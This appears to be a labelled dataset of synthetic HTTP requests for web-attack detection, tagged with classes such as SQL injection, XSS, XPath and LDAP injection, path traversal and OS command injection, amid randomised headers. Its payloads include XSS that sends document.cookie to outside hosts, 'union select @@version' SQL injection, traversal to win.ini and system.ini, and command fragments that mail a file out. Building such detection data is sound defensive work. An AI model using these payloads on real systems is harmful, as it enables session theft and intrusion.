Cookie: tua5utss8aoeraO=p0f;aeid1hNmue3ya=qAlh2eisroOhih
Cookie2: $Version="9"
Date: Mon, 30 Mar 09 17:19:10 GMT
ETag: "bT7Oxs21s533t2Ud"
Expect: sreebpa
If-Modified-Since: Sat, 28 Oct 06 13:45:22 CET
If-Unmodified-Since: Fri, 05 Nov 04 16:00:37 GMT
If-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.5
Pragma: no-cache
Authorization: NTLM dGVvd2Rld2VjYXM5cjF1eWRpdG5ydGViQmdzaWh5bnczc3ludVJF
Range: 01418-88080,370072-
Referer: http://jneqtYHR.biz/ndroke.msf
Trailer: Range
User-Agent: Mozilla/2.7 (Machintosh; U; PPC Mac OS X 5.0; 7l-Rs; rv:3.4.4) Gecko/97653072
UA-CPU: PowerPC
UA-Disp: 633,7308,8
UA-Pixels: 512x475
Via: HTTP/2.7 72.36.18.170
Transfer-Encoding: identity
Upgrade: ehi1/8.7, p1nc/9.5

null

End - Id: 42933
Start - Id: 43361
class: OsCommanding
GET /et3wYO76Yhc@R_Mw/Ei5qehwteer.exe?eUUKgi@CqRW=123577&kb3g6=iOnMG0Pr8L&Lyrye5=dzL8nzR5-Pir&ecknes1no4n=%5Cnuftp+++++-p+++www.laassiie.com+%2Ferie%2Fstra%2Fit%2Ficndch%2Fniasen%2Fie&Mfeqmstuowo=rw3sil1eoeEr HTTP/1.1
Host: www.iolEssj.de:9148
Connection: close
Accept: video/*;q=0.4, application/*
Accept-Charset: iso-8859-8-i, iso-8859-1, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 156.10.128.233
Cookie: 5aynsmdlr=sdemevot;fsAe=mnlTe-tdl
Cookie2: $Version="744"
Date: Mon, 06 Apr 09 08:01:29 GMT
ETag: "Ek60HbXdSSvRl_Eny"
Expect: seetl=mqbf
From: vpsly@coiheDy.uk
If-Modified-Since: Thu, 30 Apr 09 12:48:43 UTC
If-Unmodified-Since: Fri, 25 May 07 23:20:49 GMT
If-Match: "9AhCI5mLz0PxiszuM"
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: *
Max-Forwards: 57
MIME-Version: 3.7
Pragma: q=hoq
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: ue4es yeotAneb=lier
Range: 9-
Referer: /It02f/ctdWsto/tz0saL8/rVoeef.mpeg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/7.0 (Windows; U; Windows NT 6.3; oi-nt; rv:5.6.4) Gecko/46601483
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3255845056436088473
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43361
Start - Id: 37798
class: LdapInjection
GET /8CoeY7/jMlofhmm7evtwt/OY_ODNPCJJiS6fv/0kW3rzNMP7aTXw3R.php3?disae9mehi=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ch=ub1eoeaOgmolithd HTTP/1.0
Host: www.ts4sa.gov:3
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: min-fresh=309
Client-ip: 88.4.33.9
Cookie: aeoea9s=noaM;hr=yGU;FOOQfrom.Z_8=hetihahn
Cookie2: $Version="7"
Date: Thu, 10 Nov 05 18:07:01 GMT
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sat, 15 Apr 06 15:08:10 CET
If-Unmodified-Since: Fri, 23 Apr 04 21:15:39 CET
If-Match: *
If-None-Match: "Zcce8fjmgI08heW"
If-Range: Tue, 29 Dec 09 11:28:05 CET
Max-Forwards: 1198
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Digest nc=bC8DDEDe
Range: 33-,197469-1
Referer: http://www.sternleO.cz/esNyai/5noe9/dPtocmmf.avi
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 9.6; di-8e; rv:5.2.1) Gecko/32232541
UA-CPU: x86
UA-Disp: 654,6999,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: HTTP/8.7 173.130.236.5, HTTP/8.3 8.113.27.6:7181
Transfer-Encoding: deflate
Upgrade: et7h/0.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37798
Start - Id: 45586
class: PathTransversal
GET /ewoe8oeseB/bpqQMb3FNiQG7A9J@/hAE6ZV/tp@iW/ex4myaaq/z0childdhUGz/ovps/jmenetrt/ecseswzoh/rtFQPjg.nsf?sn8eHd=iKoQ5DjjhR&A7ziirheEi=wgeteei&7odtrd8h3a9ir=..........................WINNTsystem.ini HTTP/1.0
Host: www.jtktrtd.it
Connection: close
Accept: audio/x-wav;q=0.4, video/*;q=0.2
Accept-Charset: iso-8859-2;q=0.1, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: si-oi;q=0.0
Cache-Control: max-stale=52489
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Tue, 06 Jul 04 23:30:28 GMT
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: 100-continue
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Thu, 18 Aug 05 09:09:31 UTC
If-Unmodified-Since: Sun, 11 Apr 10 05:48:17 GMT
If-Match: *
If-None-Match: "qKIFnAfIf@bzpURXptw"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: -3163,-605229
Referer: /Tny704wA/emle/eetit.nsf
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 5.8; tO-Sn; rv:0.1.3) Gecko/48817884
UA-CPU: StrongARM
UA-Disp: 911,8166,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 6.9 www.sHTtshm.png, 8.0 www.sj2st.js, 7.4 www.tUqent.shtml
Transfer-Encoding: gzip
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45586
Start - Id: 47270
class: XSS
GET /xokm/haoxt.msf?Tthnleheol4ted=so+ieso%3E+&euesee=qmi51aDeinthteirNb&olobtcIhFQHWec=+tceu&systemg2jlR=%3Ca+++href%3D%22+++++javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.dese.com%2Fcgi-bin%2Flaan.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E HTTP/1.1
Host: www.znsac.uk
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr;q=0.7, koi8-r, euc-kr, gb2312
Accept-Encoding: 
Accept-Language: sua-e;q=0.5, hnlitct-LruAirtr;q=0.2
Cache-Control: no-store
Client-ip: 10.37.184.28
Cookie: 72.Kqb-5G=as5Ssh
Cookie2: $Version="29"
Date: Tue, 30 Mar 04 09:51:06 GMT
ETag: W/"@N7GG..KkIBBJaTNB"
Expect: ntthjebs
From: mrdmtn@ziesi15.ch
If-Modified-Since: Sat, 22 Dec 07 15:53:08 GMT
If-Unmodified-Since: Wed, 26 Nov 08 04:53:56 CET
If-Match: *
If-None-Match: "Yo3zNj2L5k9mqhj85.gO"
If-Range: *
Max-Forwards: 2336
MIME-Version: 3.6
Pragma: Osfn=lyfaEn
Proxy-Authorization: mtro slchatu=hneem
Authorization: Basic T2V3bmthbjpMZ2kxZmE=
Range: 3-25949,-0524
Referer: http://www.ogsiAh.st/iiMfmeh/re2uuo/yugm9.gif
TE: gzip,chunked;q=0.8
Trailer: Trailer
User-Agent: ibdpmDdP http://www.fdl3a.be
UA-CPU: x86
UA-Disp: 263,853,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 753x7661
Via: 2.6 www.uet5U.js
Transfer-Encoding: gzip
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47270
Start - Id: 42984
class: OsCommanding
GET /IE_/brOVT02Sq97h4-TzTu.jpg?G4PcmdST=Cs&_FNpT=dTf%5C8pmoasedqi&ngta30ssoiz=7996&rmZag5Clikeprocessing-instructionwRqz=0548509237&xs8nAecrTnroa=dEzZjFxLGHVo&cd=n&s6Vkwls=insQrorenjneeeo104&Xlt=loReandropot5m HTTP/1.1
Host: 154.91.179.2:12784
Connection: osouaaim
Accept: text/*;q=0.6, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: 7Aw0dy-seprqSeT;q=0.0, af1ott-ep, eee8-a7ojol;q=0.0, 2efeie-nlsJt, s-naSudthc;q=0.3
Cache-Control: min-fresh=459
Client-ip: 95.97.72.17
Cookie: t78hndeC4P8dnd=/bin/ps%00   |;3nhazoeeie=62347913;17_v=416611;hidcb5gnrcyUQba=lf
Cookie2: $Version="4"
Date: Sun, 25 Dec 05 01:31:32 GMT
ETag: W/"dRpp5n3Wlhe4zmrt"
Expect: 100-continue
From: 7MeMfe@gyahIt.cz
If-Modified-Since: Fri, 16 Feb 07 14:34:52 GMT
If-Unmodified-Since: Sat, 04 Apr 09 03:17:18 GMT
If-Match: *
If-None-Match: "sA39QeXav9FXFhZi"
If-Range: "Goshdex-CLZeLRu6wxw"
Max-Forwards: 4
Pragma: atlst=ri
Proxy-Authorization: Digest qop=auth
Authorization: Digest algorithm=MD5
Referer: http://www.tlhtzlod.uk/eergsI.php3
User-Agent: 02cnvEM http://www.tblt.de
UA-CPU: PowerPC
Via: 5.0 www.1Gta2c.gif, 7.4 114.186.42.0
Transfer-Encoding: deflate
Warning: 304 www.rahw3it.shtml "hmudaRiec" 
----: -------------------------------------------

null

End - Id: 42984
Start - Id: 48767
class: XPathInjection
GET /n8-QsJq/lrlootntOsas4dacfna/aj-s2fm.gK@HbOe/U5netcatdelete_UstdinJCcatsam/ein5wYCA/amcgEyZ@riIp7KN8/lOrLncnee9ohnMumihfs/npV/sxEueadl/os2drkhanass/..xX/ef19ayQ4rpceh.aspx?uEformm=ehan%27++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++%27iHtByt%27++++%3D++++%27 HTTP/1.0
Host: 52.40.131.91:80
Connection: keep-alive
Accept: application/*, application/rtf, text/plain;q=0.4
Accept-Charset: iso-8859-8;q=0.1, gb2312, macintosh;q=0.0, x-mac-arabic;q=0.5, cp-936
Accept-Encoding: compress
Accept-Language: S4nmleal-e0ie, sa-oPef;q=0.6
Cache-Control: min-fresh=28
Client-ip: 232.245.220.245
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Wed, 26 Oct 05 12:02:32 UTC
ETag: "JPkHbt63LZW@TgBTvjUE"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Tue, 01 Feb 05 02:03:34 GMT
If-Unmodified-Since: Fri, 19 Mar 04 08:16:29 UTC
If-Match: *
If-None-Match: "2BhulWHOWbizh6GahDZf"
If-Range: Sun, 05 Apr 09 24:39:05 UTC
Max-Forwards: 7559
MIME-Version: 1.8
Pragma: a7raot='8nrwBMl'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Basic cElhbDplZWljMUVl
Range: -333764,-7
Referer: /ersaee/r1oe.php4
TE: deflate,gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: tsksxrAuooebr
UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 3.9 www.edesotms.tiff:1, 3.4 201.178.12.215:8619, nntpp/4.8 www.ltTci.jpg
Transfer-Encoding: gzip
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 293 134.186.67.219:260 "nqtLnfhksiegnt" "Tue, 17 Mar 09 23:34:24 UTC"
X-Forwarded-For: 98.154.59.21
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48767
Start - Id: 43535
class: OsCommanding
GET /b-/pC@dGTXS/gzckkQJIdqG/c1vn6neev/lhhtn4eut/i9QEVXRPoc7d/AOem8H..i.aspx?IeegUaeCCnTqfp=+cwgettch%26m+s4OcrE&in=uq6&CfcOVWZxV@=mail++xls2rtpid3%40eaVP2sev.diili3.gov+++%3C%3C++%2Ftmp%2Fwu.c++++%3B&lth6csE=024 HTTP/1.0
Host: www.ehdnwtaei.de:3910
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, identity;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 214.70.1.175
Cookie: 3uedropbE=9208;IM1tagrrr=hap-Ca;weobfrl1tc=yT8 sio e$v
Cookie2: $Version="985"
Date: Sun, 25 Nov 07 11:13:10 GMT
ETag: W/"IRDWyMlE6.clcPc7DJep"
Expect: hhdoic
From: sLseahcS@fLazt.org
If-Modified-Since: Sun, 12 Jul 09 19:21:06 CET
If-Unmodified-Since: Fri, 27 Jan 06 09:35:47 GMT
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: "a7u6-YCtucnI9pfpAV4n"
Max-Forwards: 4744
MIME-Version: 1.5
Pragma: renh6='EEo'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: 2wgtl ehdncs=dunee
Range: -983461,45-31195
Referer: /p7loe.tiff
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: cDzv_wZ http://www.trdlbn.it
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5688x504
Via: 2.8 170.106.50.102:3337
Transfer-Encoding: deflate
Upgrade: 5aRp/4.4, fqts/9.9, eeo/3.4, hho/0.4, pitko/1.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43535
Start - Id: 42767
class: SqlInjection
POST /nndalsdNcAKho6erlzy/T6OV/H1z.bin? HTTP/1.0
Content-Length: 131
Content-Language: eec
Content-Encoding: deflate
Content-Location: http://www.gt4m.it/tlatf0/9hpfs/Drhuiul/uanl3wvt/dnnyp.jsp
Content-MD5: aHJlZUZ6d2VMdDlybmVodQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Feb 08 15:38:35 UTC
Last-Modified: Tue, 19 Jul 05 20:39:45 CET
Host: www.arfita.com:713
Connection: ep9t1dir
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.2, deflate;q=0.8, gzip
Accept-Language: hc-s;q=0.2, Seta-w, ths-m2vei2;q=0.3, b9-fmrei, r-rglie7;q=0.8
Cache-Control: min-fresh=8
Client-ip: 88.137.246.81
Cookie: ajbyatts6oqNi=logleeu;xeDetauieoMisah=eeiedK'    UNION    ALL SELECT    xBAdew2   FROM   idhiIii   WHERE  ''    = ';E4zKCv=T5hrvbnsdl758bteA
Cookie2: $Version="22"
Date: Thu, 28 Jan 10 16:05:06 UTC
ETag: "8e@5tPSafgmDVQE"
Expect: 100-continue
From: anpaN@pbason.biz
If-Modified-Since: Thu, 03 Sep 09 10:00:06 GMT
If-Unmodified-Since: Thu, 07 Jan 10 04:11:22 CET
If-Match: "sgtW-JzslrF3mBCz0qC"
If-None-Match: *
If-Range: Wed, 15 Aug 07 02:31:57 GMT
Max-Forwards: 5654
Pragma: no-cache
Proxy-Authorization: Basic cnRjdGlIZDoxbnV0
Authorization: NTLM ZXJob25vdTRzNnpldWlzaEJoSnRzajJlZWx4dHRzNXJkY21hYWViazBycg==
Range: -6,803-,601849-26
Referer: http://inM6ri.fr/txnfsrde/dhtca.exe
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.3 (X11; U; SunOS sun4u 6.4; ze-rb; rv:2.7.7) Gecko/60190941
UA-Disp: 110,8354,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 648x107
Via: HTTP/4.3 116.194.100.225:01704, FTP/7.2 www.srhe.shtml
Transfer-Encoding: gzip
Upgrade: Hic/2.5, elet/9.7
Warning: 191 www.mbisc.gif "soxseOi" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

ogt=350417&dr4Sdto=8SsaS4EjpeVO&kxIrfTauro=tcps&mgva0mdiv3mochar=6&8-t8qXJ=ns dmi=iorzp[N&WgK@Jlk.JO=(~kens&GonrcstdeFiea=8

End - Id: 42767
Start - Id: 49944
class: XPathInjection
GET /oc/QrCgVwUo1b7Elff/9Zb/rrdKiiOb@/5JbHu3/ikosgp/hmgcmiabhldr/90Cc1Q_3uAIQlti31_T/io55ag4otri.swf?daa=honourF&n2E=rhC+%5CnerlgmGsd%3Cve&2ntoeetsti=417396&cgndamegrbo8itn=712249&ciFkpsn=089370103&oip=tQv&HElJ0l@.w6=0&PliEriiostT=le8&z8-gZJmeta3x=696810&4w=8601127&XbingF_=46043++++or++++1%3C++tHdnc%2Ftmg%2Fexlott%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D566%5D+++or++7%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&ltoia=9 HTTP/1.0
Host: 175.68.204.58
Connection: kionu9nc
Accept: text/*;q=0.1, audio/x-wav;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: compress, identity, compress;q=0.4, compress;q=0.5
Accept-Language: ei-rolfrnGv;q=0.9, Epn-bettoe;q=0.3, ol-foas
Cache-Control: only-if-cached
Client-ip: 6.57.199.123
Cookie: hogd=Rsssehmrr7reuonb;Eiooasy8aOM=h8lcozton5Noaaemp
Cookie2: $Version="94"
Date: Tue, 26 Dec 06 05:48:01 CET
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: ntedRr@r9cY.gov
If-Modified-Since: Mon, 09 Aug 04 01:57:55 UTC
If-Unmodified-Since: Mon, 20 Nov 06 02:41:15 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Feb 08 17:02:51 UTC
Max-Forwards: 2841
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: NTLM QW5ibnJncGxhM2F0c2Jpb2hocnRlN2JUbGVldHdobm5jYWxmb3Rjem9odXM0cg==
Range: 33-0
Referer: /6mee1ot/wwysra/jFadn7tm/mttIe/ymnoae.jsp
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/1.5 (X11; U; Solaris 0.0; vx-Ee; rv:4.5.1) Gecko/17329251
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 299x2707
Via: 6.0 141.121.182.232, HTTP/7.1 www.lphaS.gif, 5.9 www.hiA8oae.png:35
Transfer-Encoding: identity
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49944
Start - Id: 47075
class: XSS
GET /cDnI4.cgi?ieomo6nveisisa6=tgnvu&dhdeWapc=t++&gfJZA@0uJKI=754868&cssEfDnah=++leeylogaihsrime+aL&NHmxISeiY5=%26%7B%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.trtoal.com%2Fcgi-bin%2Fnasternt.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&aanaaEeuvceh8oe=98452&._Buo=xtih4suscDolhrh&r8ta=2244787 HTTP/1.0
Host: www.lyro4.org
Connection: stdye
Accept: audio/*
Accept-Charset: iso-2022-kr;q=0.8, utf-7;q=0.5
Accept-Encoding: 
Accept-Language: t3roLasr-L5sdo;q=0.9, 4nrml-ymx;q=0.2, htpnioea-Eezsartn
Cache-Control: no-transform
Client-ip: 221.55.28.21
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="2"
Date: Mon, 13 Sep 04 24:00:26 UTC
ETag: W/"qivQOJMh@tYyao0_E"
Expect: yshaae=hl6e2eC
From: ea8Dl2@Editdvt.it
If-Modified-Since: Mon, 18 Sep 06 11:19:36 UTC
If-Unmodified-Since: Tue, 07 Sep 04 17:58:02 CET
If-Match: "Dri8@JuS0nmwkLViD"
If-None-Match: *
If-Range: Wed, 17 Jun 09 01:10:28 GMT
Max-Forwards: 111
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Nnphc2l0b2hlbWVJc2k2eGh0cmUyYThvb3NUcndzZXJj
Range: 44535-
Referer: /s6oltg/WstrnM/nbatssto/oegoh/snxlt.gz
TE: deflate;q=0.3,gzip
Trailer: Pragma
User-Agent: Mozilla/7.7 (X11; U; Linux i586 9.1; dt-nn; rv:0.8.4) Gecko/82759524
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 987x1282
Via: rar/9.8 239.128.120.38, FTP/9.7 www.caih.htm
Transfer-Encoding: compress
Upgrade: helf/2.2
Warning: 866 194.109.86.190 "oqteeaa" 
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47075
Start - Id: 45074
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: www.ioAsnlie.gov:933
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: euc-kr;q=0.0, euc-jp;q=0.3, ks_c_5601-1987
Accept-Encoding: identity, gzip;q=0.0, deflate, gzip, compress;q=0.9
Accept-Language: siyDr-8jao8s;q=0.8, sstrouho-lbjkluee;q=0.3, ldmesoda-1rsteeld;q=0.4, 7-il;q=0.8
Cache-Control: no-store
Client-ip: 101.182.197.221
Cookie: Tz6WyA=rt3oaasosg9;eeet5=y)xfieinput]Ot ;kTus8uc=u'%ul\4scriptetmpm echoe;pyijGigo0at=7154644;agYV53x6qkFu=g8khsiah4oNrua0tdh
Cookie2: $Version="785"
Date: Fri, 19 Dec 08 10:50:25 GMT
ETag: "_uREHyn1qc_Dj7YZg"
Expect: 100-continue
From: 8gV2@oyweendsp.ch
If-Modified-Since: Mon, 14 Nov 05 03:21:58 GMT
If-Unmodified-Since: Tue, 14 Apr 09 19:07:45 UTC
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: Thu, 12 Feb 09 04:56:57 CET
Max-Forwards: 4
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM Z2U4WG9ld2lyZ2JydWNlcGlhb2hURW5MM2xuN3JzZXV0ZGFyYWFyZg==
Range: 51016-,-10087
Referer: /adah/Xeoaeai/OEys/geadwa/eRsni.cgi
TE: trailers
Trailer: Range
User-Agent: Mozilla/4.2 (X11; U; Open BSD i386 6.3; ot-ya; rv:0.9.1) Gecko/07453458
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 533x294
Via: HTTP/6.3 www.taEto1o.css, 8.7 151.61.158.167
Transfer-Encoding: compress
Upgrade: nadi/5.9, zccv3/4.5, 3E2ei/5.6
Warning: 634 220.181.199.153 "EI6etnt" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45074
Start - Id: 35335
class: SqlInjection
GET /4@.6i.9Ge_qp/d_sPj-wQkUkRj4ztc_W/0rni/iFzaH33mD98/onaMaeTadfrlomhmwu/khtthc7rpwNr/4sirIeoArzpni/s3scer/f1t/cAd6ecez8hh.php4?L_ta=connectyvM2delete&hyxNpRb=593&opt4H@VE6L=581&suiefitwUptjhN=6758674&ioelnioGeawhv=eheaA%293agroup+bye&mm=84433&6qiovaaowYlu=i%25tct%5DiTna++htpass&ocm=5Ese0rhIavs&uHTn2_rT=%27+++++union+select+++++%40%40version%2C1%2C1%2C1--&suOs7jm02wxoT2b=EbfnconnecteG%24nnaio&orTn=iyltents&yN=23274&b8tstrAaewf3t0=207894&ZrkPY=1 HTTP/1.0
Host: 62.181.30.111:76107
Connection: Ernl0
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=059
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="9"
Date: Sat, 22 Mar 08 11:11:43 UTC
ETag: "QOvh8ehD1t657W06o5"
Expect: Umhv
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Sun, 12 Jul 09 17:47:03 GMT
If-Unmodified-Since: Thu, 22 Apr 10 14:07:38 CET
If-Match: "WjHYm2TtH2Y8ipB0t"
If-None-Match: *
If-Range: Fri, 15 Feb 08 23:20:46 GMT
Max-Forwards: 70
MIME-Version: 8.0
Pragma: norn4bs=Y
Proxy-Authorization: NTLM enRmOG93dDN5b3Rubk1oM29ObWVZenRCbnJibmltdFllRnQweW8wb1RuN3BoZQ==
Authorization: NTLM czhNYUllclJ0QnBzMHNhNjBzN2FyYWFPdW5laWllbHRlZWJlYXB0dGZ6bzhmbmg=
Range: 16442-228208
Referer: http://gann.de/sii0t/ultqt/ReGtsawb/smIOnrts.mdb
TE: trailers,deflate
Trailer: Via
User-Agent: rLlyxlKj2h http://www.oovt.cz
UA-CPU: StrongARM
UA-Disp: 339,8001,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: HTTP/7.5 211.208.223.131, 8.2 79.235.211.198, FTP/9.7 www.aaSa.shtml
Transfer-Encoding: compress
Upgrade: trno9o/8.6, tnr9dg/0.3, iet/0.3
Warning: 857 www.af1tY.jpeg "vltHuipbeAndrm" 
X-Forwarded-For: 29.33.121.207
X-Serial-Number: 9356932
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35335
Start - Id: 35723
class: XPathInjection
GET /ma/oa9ue9HLx-l7/oCTHxE-lWjpjEzX.asmx?zh7ejclaae=q%25+9exorcp%5D&ZSej=tHl2hQ&eu6yheumSSfseia=9f.aUu7Ra&nnhrsl=r8%27+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+i++%2B++j+++%2B++k+++%2B+l+%2B++++1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+%27ltanodso%27++%3D++%27+lty%27+or&hrt=j%29eise&9DV0anftpDH1Bk=9417468&rrcO=aOTBWcyy&tp=wcdzek6tl6&riyflsjnbhrCae=en0mh&pinmTwntnAs=ohreplace%3Apartncupdatet&nPuBen3=EastaDfneopenbetweenra%3Ft&tuniosZedes=144&94jV@6vXV9P=rBk8o&Y@KMscriptABXB8=7lrr&u1rteheyeRsn=2%40ocalsaiov HTTP/1.1
Host: 89.197.71.54
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-turkish, iso-10646-ucs-2;q=0.8, windows-874;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 18.203.213.243
Cookie: suctdehsisY=9o= 
Cookie2: $Version="10"
